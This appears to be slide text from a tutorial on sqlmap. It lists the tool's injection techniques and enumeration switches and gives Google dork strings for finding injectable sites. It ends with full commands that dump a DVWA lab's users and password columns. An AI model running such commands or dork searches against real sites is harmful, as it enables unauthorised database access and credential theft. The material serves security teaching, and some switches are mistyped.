sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
2. sqlmap
• It is a open source tool to use sql injection in better and simpler way.
• sqlmap Developed in python
• sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers.
• It comes with a powerful detection engine, many niche features for the ultimate penetration tester
and a broad range of switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the operating
system via out-of-band connections.
3. Sqlmap developed by
Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm)
https://twitter.com/inquisb https://twitter.com/stamparm
4. Features of sqlmap
•It support various type of database like
•MySQL
•Oracle
•PostgreSQL
•Microsoft SQL Server
•Microsoft Access
• IBM DB2
• SQLite
• Firebird
•Sybase
•SAP MaxDB
•HSQLDB
• Informix database management systems.
5. Features of sqlmap
•SQL injection techniques:
1.boolean-based blind
Based on page changes, data is inferred, char by char
2.time-based blind
Based on time, data is inferred,char by char
3.error-based
Uses the errors that are displayed to extract data
4.UNION query
Changes the SQL queries to extract data
5.stacked queries
Semi-colon are used to inject multiple statements on the SQL query
6.out-of-band
the injection is made to a web application and a secondary channel such as DNS
queries is used to dump the data back to the attacker domain.
•Enumerate users, password hashes, privileges, roles, databases, tables and columns.
• cracking password using a dictionary-based attack.
6. Features of sqlmap
•Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem
command.
•Support to dump database tables entirely.
•Support to dump database tables entirely.
•Support to search for specific database names, specific tables across all databases or specific
columns across all databases' tables.
•Support to directly connect to the database without passing via a SQL injection, by providing DBMS
credentials, IP address, port and database name
7. Detection
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--string=STRING String to match when query is evaluated to True
--not-string=NOT.. String to match when query is evaluated to False
--regexp=REGEXP Regexp to match when query is evaluated to True
--code=CODE HTTP code to match when query is evaluated to True
--text-only Compare pages based only on the textual content
--titles Compare pages based only on their titles
8. Extracting Information With Sqlmap
RECOVER SESSION USER USING SQLMAP.
--current-user
DETECT CURRENT DATABASE USING SQLMAP.
--current-db
FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP.
--is-dba
LIST DATABASE SYSTEM USERS USING SQLMAP.
--users
LIST DATABASES USING SQLMAP.
--dbs
DBMS SERVER HOSTNAME.
--hostname
DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL.
-f
9. Extracting Information With Sqlmap
LIST THE DBMS USERS.
--users
LIST ALL DBMS USERS, PASSWORD HASHES
--passwords
LIST USERS PRIVILEGES.
--privileges
LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE
--columns (-T <table name> -D <database>)
EXECUTING A CUSTOM SQL QUERY.
--sql-query=“<sql query to execute>”
SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES
--sql-shell
10. Extracting Information With Sqlmap
DBMS database to enumerate
-D (Database_name)
DBMS database table(s) to enumerate
-T (table_name)
DBMS database table column(s) to enumerate
-C (columns_name)
Dump DBMS database table entries
--dump
Dump all DBMS databases tables entries
--dump-all
Enumerate DBMS database tables
--tables
Enumerate DBMS users roles
--roles
11. Extracting Information With Sqlmap
Retrieve DBMS banner
-b, --banner
Enumerate DBMS schema
--schema
Retrieve DBMS comments
--comments
12. Sqlmap : workflow
•Find a vulnerable website
• Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
•inurl:product-item.php?id=
•inurl:news.php?catid=
•inurl:index.php?id=
•inurl:title.php?id=
•Identify possible injections points
•Identify SQLI vulnerabilities:
•By using sqlmap
•Manual testing
•Exploit SQLi vulnerabilities
16. List tables of target database using SQLMAP
SQL Injection
Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie=
”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa --tables
17. List columns on target table of selected
database using SQLMAP SQL Injection
Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie=
”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users --columns
18. List user and password from target columns of target table of
selected database using SQLMAP SQL Injection
Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie=
”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users –C user,user_id,password --dump